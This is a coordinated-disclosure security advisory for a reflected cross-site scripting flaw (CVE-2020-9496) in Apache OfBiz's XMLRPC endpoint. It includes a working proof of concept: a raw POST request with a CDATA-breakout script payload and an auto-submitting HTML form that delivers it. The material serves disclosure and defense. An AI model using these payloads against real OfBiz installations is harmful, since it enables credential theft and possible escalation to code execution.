August 12, 2020

GHSL-2020-068: Cross-Site Scripting in Apache OfBiz - CVE-2020-9496

Alvaro Muñoz

Summary

Apache OfBiz is vulnerable to Reflected Cross-Site Scripting through POST request

Product

Apache Ofbiz

Tested Version

17.12.01

Details

Cross-Site Scripting in XMLRPC module

/webtools/control/xmlrpc exposes some unauthenticated services such as ping. We can use this service to reflect arbitrary data and get a Cross-Site Scripting issue

POST /webtools/control/xmlrpc?echo=foo HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Origin: https://localhost:8443
Connection: keep-alive, Upgrade
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/xml
Content-Length: 140

]]></string><a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(document.domain)</a:script><string><![CDATA[

A POST XSS issue can be triggered by fooling the victim into visiting a malicious page. e.g:

<html>
<body>
<form name=TheForm action=http://localhost:8080/webtools/control/xmlrpc?echo=foo method=post enctype="text/plain">
<input type=hidden name=foo value="]]></string><a:script xmlns:a='http://www.w3.org/1999/xhtml'>alert(document.domain)</a:script><string><![CDATA[" >
</form>
<script>
document.TheForm.submit();
</script>
</body>
</html>

Impact

This issue may lead to a variety of attacks from page defacements to stealing user/admin credentials. In conjunction with any SSTI issues this issue can be escalated into a Remote Code Execution.

CVE

  • CVE-2020-9496

Coordinated Disclosure Timeline

  • 04/13/2020: Report sent to vendor.
  • 04/23/2020: OfBiz maintainer acknowledges the issue.

Credit

This issue was discovered and reported by GHSL team member @pwntester (Alvaro Muñoz).

Contact

You can contact the GHSL team at securitylab@github.com, please include the GHSL-2020-068 in any communication regarding this issue.